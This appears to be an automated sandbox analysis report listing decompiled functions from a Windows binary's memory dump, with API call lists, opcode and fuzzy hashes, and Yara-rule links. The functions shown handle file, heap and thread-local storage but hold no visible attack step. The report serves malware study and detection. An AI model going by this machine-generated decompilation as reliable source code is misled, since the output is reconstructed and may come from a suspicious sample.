                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EnvironmentVariable
                                                                                                                                                                      • String ID: $ A
                                                                                                                                                                      • API String ID: 1431749950-1415209610
                                                                                                                                                                      • Opcode ID: 37dc1e281acc41e39155b599a3fd8d037edce4260b7102e0d6fe6300a43532c6
                                                                                                                                                                      • Instruction ID: 34676badedbb0a82c232a14336f7de5419c85f3fd2839d3c24d176d6e2709967
                                                                                                                                                                      • Opcode Fuzzy Hash: 37dc1e281acc41e39155b599a3fd8d037edce4260b7102e0d6fe6300a43532c6
                                                                                                                                                                      • Instruction Fuzzy Hash: 46C01231604201ABDB11AA16C908F6BBBE6EBA1384F01C43AB985D23B0D338CC90DB09
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040AD60, Relevance: 3.1, APIs: 2, Instructions: 65memoryfileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E0040AD60(void* __ebp, void* _a4, WCHAR* _a8) {
				void* _t12;
				long _t15;
				long _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t22;

				_t18 = _a4;
				_t19 = 0;
				_t20 = E0040D438( *0x41771c, _t18);
				if(_t20 == 0) {
					return 0;
				} else {
					_t12 = CreateFileW(_a8, 0x80000000, 0, 0, 3, 0x80, 0); // executed
					_t22 = _t12;
					if(_t22 == 0xffffffff || _t22 == 0) {
						L9:
						if(_t18 != 0xffffffff) {
							_t20 = _t18;
						}
						E0040D3AA( *0x41771c, _t20);
					} else {
						_t15 =  *0x41612c; // 0x1000
						if(_t15 == 0) {
							 *(_t20 + 4) = 0;
						} else {
							_t17 = RtlAllocateHeap( *0x417008, 0, _t15); // executed
							 *(_t20 + 4) = _t17;
						}
						 *_t20 = _t22;
						_t16 =  *0x41612c; // 0x1000
						 *(_t20 + 0xc) = _t19;
						_t19 = _t20;
						 *(_t20 + 8) = _t16;
						 *((intOrPtr*)(_t20 + 0x14)) = 1;
						 *((intOrPtr*)(_t20 + 0x18)) = 2;
						 *((intOrPtr*)(_t20 + 0x1c)) = 1;
						if(_t18 != 0xffffffff) {
							_t19 = _t22;
						}
						if(_t19 == 0) {
							goto L9;
						}
					}
					return _t19;
				}
			}











                                                                                                                                                                      0x0040ad61
                                                                                                                                                                      0x0040ad6e
                                                                                                                                                                      0x0040ad75
                                                                                                                                                                      0x0040ad79
                                                                                                                                                                      0x0040ae13
                                                                                                                                                                      0x0040ad7f
                                                                                                                                                                      0x0040ad93
                                                                                                                                                                      0x0040ad99
                                                                                                                                                                      0x0040ad9e
                                                                                                                                                                      0x0040adf2
                                                                                                                                                                      0x0040adf5
                                                                                                                                                                      0x0040adf7
                                                                                                                                                                      0x0040adf7
                                                                                                                                                                      0x0040ae00
                                                                                                                                                                      0x0040ada4
                                                                                                                                                                      0x0040ada4
                                                                                                                                                                      0x0040adab
                                                                                                                                                                      0x0040adc0
                                                                                                                                                                      0x0040adad
                                                                                                                                                                      0x0040adb5
                                                                                                                                                                      0x0040adbb
                                                                                                                                                                      0x0040adbb
                                                                                                                                                                      0x0040adc3
                                                                                                                                                                      0x0040adc5
                                                                                                                                                                      0x0040adca
                                                                                                                                                                      0x0040adcd
                                                                                                                                                                      0x0040adcf
                                                                                                                                                                      0x0040add2
                                                                                                                                                                      0x0040add9
                                                                                                                                                                      0x0040ade0
                                                                                                                                                                      0x0040adea
                                                                                                                                                                      0x0040adec
                                                                                                                                                                      0x0040adec
                                                                                                                                                                      0x0040adf0
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040adf0
                                                                                                                                                                      0x0040ae0b
                                                                                                                                                                      0x0040ae0b

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040D438: EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040AD75,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D443
                                                                                                                                                                        • Part of subcall function 0040D438: LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040AD75,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D4BE
                                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000), ref: 0040AD93
                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,00001000,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040ADB5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$AllocateCreateEnterFileHeapLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2608263337-0
                                                                                                                                                                      • Opcode ID: 90f7faf706f975316c83b07ac6ced370c6fd09a1887d2f170a25e0c4fd74ef8c
                                                                                                                                                                      • Instruction ID: cb55299900a1a52b407eca00395bc400cfc912b247b49f0a026709af4e8a3faf
                                                                                                                                                                      • Opcode Fuzzy Hash: 90f7faf706f975316c83b07ac6ced370c6fd09a1887d2f170a25e0c4fd74ef8c
                                                                                                                                                                      • Instruction Fuzzy Hash: 0411D031100300ABC2305F5AEC48F57BBAAEFC5761F11863EF5A5A26E0C77698558B69
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040DB6A, Relevance: 3.1, APIs: 2, Instructions: 61memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E0040DB6A(signed int _a4, intOrPtr _a8, intOrPtr _a20) {
				void* _v0;
				intOrPtr _v4;
				void* _v8;
				void* _v12;
				void* _t19;
				long _t29;
				void* _t31;
				signed int _t33;
				void* _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				void* _t38;
				void* _t39;

				_t36 = _a20;
				_t34 = 0;
				E0040DCBD(_v0);
				_t33 = _a4;
				if(_t33 > 0) {
					_t29 = _a4 * _t33 + 0x18;
					_t19 = RtlAllocateHeap( *0x417008, 0, _t29); // executed
					_t34 = _t19;
					if(_t34 != 0) {
						 *((intOrPtr*)(_t34 + 4)) = _v4;
						 *((intOrPtr*)(_t34 + 8)) = _a8;
						_t9 = _t29 - 0x18; // 0xffffffc5
						 *(_t34 + 0x10) = _t33;
						 *(_t34 + 0x14) = _a4;
						 *((intOrPtr*)(_t34 + 0xc)) = _t36;
						 *_t34 = 1;
						_t34 = _t34 + 0x18;
						 *(_t38 + 0x30) = _t34;
						memset(_t34, 0, _t9);
						_t39 = _t38 + 0xc;
						_v0 = _t34;
						_t37 = _a8;
						if(E00411744(_a8) != 0 && _t33 > 0) {
							_t31 = _t34;
							_t35 = _v4;
							do {
								E00411B6F(_t31, _t37);
								_t31 = _t31 + _t35;
								_t33 = _t33 - 1;
							} while (_t33 != 0);
							_t34 =  *(_t39 + 0x24);
						}
					}
				}
				return _t34;
			}
















                                                                                                                                                                      0x0040db6b
                                                                                                                                                                      0x0040db71
                                                                                                                                                                      0x0040db76
                                                                                                                                                                      0x0040db7b
                                                                                                                                                                      0x0040db81
                                                                                                                                                                      0x0040db8f
                                                                                                                                                                      0x0040db9a
                                                                                                                                                                      0x0040dba0
                                                                                                                                                                      0x0040dba4
                                                                                                                                                                      0x0040dbae
                                                                                                                                                                      0x0040dbb5
                                                                                                                                                                      0x0040dbb8
                                                                                                                                                                      0x0040dbbc
                                                                                                                                                                      0x0040dbbf
                                                                                                                                                                      0x0040dbc2
                                                                                                                                                                      0x0040dbc5
                                                                                                                                                                      0x0040dbcb
                                                                                                                                                                      0x0040dbd1
                                                                                                                                                                      0x0040dbd5
                                                                                                                                                                      0x0040dbda
                                                                                                                                                                      0x0040dbdd
                                                                                                                                                                      0x0040dbe0
                                                                                                                                                                      0x0040dbec
                                                                                                                                                                      0x0040dbf2
                                                                                                                                                                      0x0040dbf4
                                                                                                                                                                      0x0040dbf8
                                                                                                                                                                      0x0040dbfa
                                                                                                                                                                      0x0040dbff
                                                                                                                                                                      0x0040dc01
                                                                                                                                                                      0x0040dc01
                                                                                                                                                                      0x0040dc04
                                                                                                                                                                      0x0040dc04
                                                                                                                                                                      0x0040dbec
                                                                                                                                                                      0x0040dc08
                                                                                                                                                                      0x0040dc0e

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040DCBD: HeapFree.KERNEL32(00000000,-00000018,00000200,00000000,0040DB7B,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,0041607C,00417090,00000004), ref: 0040DCFE
                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,0041607C,00417090,00000004,00000000,0041606C), ref: 0040DB9A
                                                                                                                                                                      • memset.MSVCRT ref: 0040DBD5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Heap$AllocateFreememset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2774703448-0
                                                                                                                                                                      • Opcode ID: b4b42cf12e6a71c38c390e7d4c2b16159ff475ec6d8ebd77654cc0985d18a278
                                                                                                                                                                      • Instruction ID: 4684dd51efb4be1c7f6cbbcd141334eab977ef2b41965c3d3424e441a95aa271
                                                                                                                                                                      • Opcode Fuzzy Hash: b4b42cf12e6a71c38c390e7d4c2b16159ff475ec6d8ebd77654cc0985d18a278
                                                                                                                                                                      • Instruction Fuzzy Hash: 8C117C729047149BC320DF49D840A4BBBE8FF98B50F05452EF989A7351D774EC04CBA5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040E200, Relevance: 3.1, APIs: 2, Instructions: 52memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E0040E200(signed int _a4, void* _a8) {
				void** _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				long _t32;
				void* _t44;
				void* _t45;

				_t32 =  *0x416170; // 0x1b
				_v8 = TlsGetValue(_t32);
				if(_a8 == 0xffffffff) {
					_a8 = _v8[2];
				}
				_v12 = _v8[2] + _a4 * 2;
				if(_v12 >= _v8[1] - 4) {
					_v8[1] = _v12 + 0x4000;
					_t44 =  *0x417720; // 0x2370000
					_t45 = RtlReAllocateHeap(_t44, 0,  *_v8, _v8[1] + 0xa); // executed
					 *_v8 = _t45;
				}
				_v16 =  *_v8 + _a8;
				_v8[2] = _a8 + _a4 * 2;
				return _v16;
			}









                                                                                                                                                                      0x0040e206
                                                                                                                                                                      0x0040e212
                                                                                                                                                                      0x0040e219
                                                                                                                                                                      0x0040e221
                                                                                                                                                                      0x0040e221
                                                                                                                                                                      0x0040e230
                                                                                                                                                                      0x0040e23f
                                                                                                                                                                      0x0040e24c
                                                                                                                                                                      0x0040e261
                                                                                                                                                                      0x0040e267
                                                                                                                                                                      0x0040e270
                                                                                                                                                                      0x0040e270
                                                                                                                                                                      0x0040e27a
                                                                                                                                                                      0x0040e289
                                                                                                                                                                      0x0040e292

                                                                                                                                                                      APIs
                                                                                                                                                                      • TlsGetValue.KERNEL32(0000001B,00001000,00000000,00000000), ref: 0040E20C
                                                                                                                                                                      • RtlReAllocateHeap.NTDLL(02370000,00000000,?,?), ref: 0040E267
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeapValue
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3894635346-0
                                                                                                                                                                      • Opcode ID: b65472d8892799a2ab790df46868f8da18113432f0cbb7547d7b3206bfd8583f
                                                                                                                                                                      • Instruction ID: 26b5320e93437fcb7b3a7e471c4fbc50e4a3a6070049850fe70d883a15f06819
                                                                                                                                                                      • Opcode Fuzzy Hash: b65472d8892799a2ab790df46868f8da18113432f0cbb7547d7b3206bfd8583f
                                                                                                                                                                      • Instruction Fuzzy Hash: F821A478A00208EFCB00CF98D59499DB7B5FB88314B24C1A9E9199B355D631EE52DF44
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040A970, Relevance: 3.0, APIs: 2, Instructions: 31memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E0040A970(signed int _a4) {
				void** _t4;
				void** _t11;

				_t9 = _a4;
				if(_a4 != 0xffffffff) {
					_t4 = E0040D3F9( *0x41771c, _t9);
					_t11 = _t4;
					if(_t11 != 0) {
						if(_t11[1] != 0) {
							E0040A9E0(_t11);
							HeapFree( *0x417008, 0, _t11[1]);
						}
						FindCloseChangeNotification( *_t11); // executed
						_t4 = E0040D3AA( *0x41771c, _t9);
					}
					return _t4;
				} else {
					return E0040D995( *0x41771c);
				}
			}





                                                                                                                                                                      0x0040a971
                                                                                                                                                                      0x0040a978
                                                                                                                                                                      0x0040a991
                                                                                                                                                                      0x0040a996
                                                                                                                                                                      0x0040a99a
                                                                                                                                                                      0x0040a9a0
                                                                                                                                                                      0x0040a9a3
                                                                                                                                                                      0x0040a9b3
                                                                                                                                                                      0x0040a9b3
                                                                                                                                                                      0x0040a9bb
                                                                                                                                                                      0x0040a9c8
                                                                                                                                                                      0x0040a9c8
                                                                                                                                                                      0x0040a9cf
                                                                                                                                                                      0x0040a97a
                                                                                                                                                                      0x0040a986
                                                                                                                                                                      0x0040a986

                                                                                                                                                                      APIs
                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000), ref: 0040A9B3
                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040A9BB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ChangeCloseFindFreeHeapNotification
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1642550653-0
                                                                                                                                                                      • Opcode ID: 1101ea52ee8bc232e257b11b4dfa0e022e50a41f92f453deb7857e88e1fe02c5
                                                                                                                                                                      • Instruction ID: 4b594e9f44d889535f58429decad5894e80191ff52abe98a3990b8650259e3e7
                                                                                                                                                                      • Opcode Fuzzy Hash: 1101ea52ee8bc232e257b11b4dfa0e022e50a41f92f453deb7857e88e1fe02c5
                                                                                                                                                                      • Instruction Fuzzy Hash: 45F08272505700ABC7222B99FC05F8BBB72EB91764F12893AF610210F8C7355861DB5D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040A759, Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E0040A759(WCHAR* _a4, signed char _a8) {
				int _t8;

				if(_a4 == 0) {
					return 0;
				}
				if((_a8 & 0x00000002) != 0) {
					SetFileAttributesW(_a4, 0x80);
				}
				_t8 = DeleteFileW(_a4); // executed
				return _t8;
			}




                                                                                                                                                                      0x0040a75e
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040a782
                                                                                                                                                                      0x0040a765
                                                                                                                                                                      0x0040a770
                                                                                                                                                                      0x0040a770
                                                                                                                                                                      0x0040a77a
                                                                                                                                                                      0x00000000

                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(00000002,00000080,0040A792,02379F50,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000), ref: 0040A770
                                                                                                                                                                      • DeleteFileW.KERNELBASE(00000000,0040A792,02379F50,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040A77A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$AttributesDelete
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2910425767-0
                                                                                                                                                                      • Opcode ID: d20dcc2b1ea866854d894abaed1435a963998bb33ced13a9451e631658276eaf
                                                                                                                                                                      • Instruction ID: 32816558c3505e2600197b6aa1c8e1867431839d95d1f98e5f62e5383a3a81ae
                                                                                                                                                                      • Opcode Fuzzy Hash: d20dcc2b1ea866854d894abaed1435a963998bb33ced13a9451e631658276eaf
                                                                                                                                                                      • Instruction Fuzzy Hash: ECD06730148301A6D2555B20D90D79A7AB16B80786F15C829B485510F5C778C865E60B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040DDD0, Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E0040DDD0() {
				void* _t1;
				void* _t4;

				_t1 = HeapCreate(0, 0x1000, 0); // executed
				 *0x417720 = _t1;
				 *0x416170 = TlsAlloc();
				return E0040E600(_t4);
			}





                                                                                                                                                                      0x0040dddc
                                                                                                                                                                      0x0040dde2
                                                                                                                                                                      0x0040dded
                                                                                                                                                                      0x0040ddf8

                                                                                                                                                                      APIs
                                                                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040DDDC
                                                                                                                                                                      • TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040DDE7
                                                                                                                                                                        • Part of subcall function 0040E600: HeapAlloc.KERNEL32(02370000,00000000,0000000C,?,?,0040DDF7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E60E
                                                                                                                                                                        • Part of subcall function 0040E600: HeapAlloc.KERNEL32(02370000,00000000,00000010,?,?,0040DDF7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E622
                                                                                                                                                                        • Part of subcall function 0040E600: TlsSetValue.KERNEL32(0000001B,00000000,?,?,0040DDF7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E64B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocHeap$CreateValue
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 493873155-0
                                                                                                                                                                      • Opcode ID: 4e641117bd55311371697391a61bc67f1fb8624d6db014dbb9304ac05d49361e
                                                                                                                                                                      • Instruction ID: 18e5a0edc7d50c2b567692700943758183887443e0587578baab4a09ae3a6d99
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e641117bd55311371697391a61bc67f1fb8624d6db014dbb9304ac05d49361e
                                                                                                                                                                      • Instruction Fuzzy Hash: C9D0127454430467D6002FB1BC0E7843B68B708B46F514C35F619962D1DBB5A000C51C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00402BFA, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 67%
                                                                                                                                                                      			E00402BFA(void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v8;
				WCHAR* _v16;
				WCHAR* _v20;
				char _v24;
				intOrPtr _v36;
				void* _t17;
				void* _t23;
				void* _t25;
				void* _t26;
				void* _t27;
				intOrPtr _t31;
				intOrPtr _t32;
				void* _t35;
				void* _t36;
				intOrPtr* _t37;

				_push(0);
				_push(0);
				_push(0);
				E004051A0(E0040DF60(), _a8);
				_t31 = _v0;
				E00405060(_t37, _t31);
				_v16 = E00409B40(0x2710);
				GetShortPathNameW(_v20, _v16, 0x2710); // executed
				_t17 = E0040DE20();
				_t32 = _t31;
				_push(_t17);
				E00409BB0(_v16, 0xffffffff, E0040DE20());
				E0040DE60( &_v24, _t32);
				E00409B20(_v36);
				_push(_v36);
				_t23 = E0040DE20();
				_pop(_t35);
				E0040DFC0(_t35);
				_t25 = _t23;
				_t26 = E00405170();
				_t36 = _t25;
				_t27 = _t26 + _t36;
				return E0040DEF0(E0040DEF0(_t27,  *_t37), _v8);
			}



















                                                                                                                                                                      0x00402bfc
                                                                                                                                                                      0x00402bfd
                                                                                                                                                                      0x00402bfe
                                                                                                                                                                      0x00402c08
                                                                                                                                                                      0x00402c0d
                                                                                                                                                                      0x00402c14
                                                                                                                                                                      0x00402c23
                                                                                                                                                                      0x00402c34
                                                                                                                                                                      0x00402c3a
                                                                                                                                                                      0x00402c3f
                                                                                                                                                                      0x00402c40
                                                                                                                                                                      0x00402c52
                                                                                                                                                                      0x00402c5c
                                                                                                                                                                      0x00402c65
                                                                                                                                                                      0x00402c6e
                                                                                                                                                                      0x00402c6f
                                                                                                                                                                      0x00402c74
                                                                                                                                                                      0x00402c77
                                                                                                                                                                      0x00402c7c
                                                                                                                                                                      0x00402c7e
                                                                                                                                                                      0x00402c83
                                                                                                                                                                      0x00402c84
                                                                                                                                                                      0x00402ca6

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040DF60: TlsGetValue.KERNEL32(0000001B,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C), ref: 0040DF77
                                                                                                                                                                        • Part of subcall function 00409B40: RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409B51
                                                                                                                                                                      • GetShortPathNameW.KERNEL32 ref: 00402C34
                                                                                                                                                                        • Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
                                                                                                                                                                        • Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
                                                                                                                                                                        • Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B
                                                                                                                                                                        • Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
                                                                                                                                                                        • Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02370000,00000000,?), ref: 0040DE99
                                                                                                                                                                        • Part of subcall function 00409B20: RtlFreeHeap.NTDLL(00000000,00000000,00401B6B,00000000,00000000,?,00000000,00000000,00416020,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00409B2C
                                                                                                                                                                        • Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7
                                                                                                                                                                        • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402FED,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                                                                                                                                                                        • Part of subcall function 0040DEF0: HeapFree.KERNEL32(02370000,00000000,00000000,?,00000000,?,00411AC4,00000000,00000000,-00000008), ref: 0040DF08
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
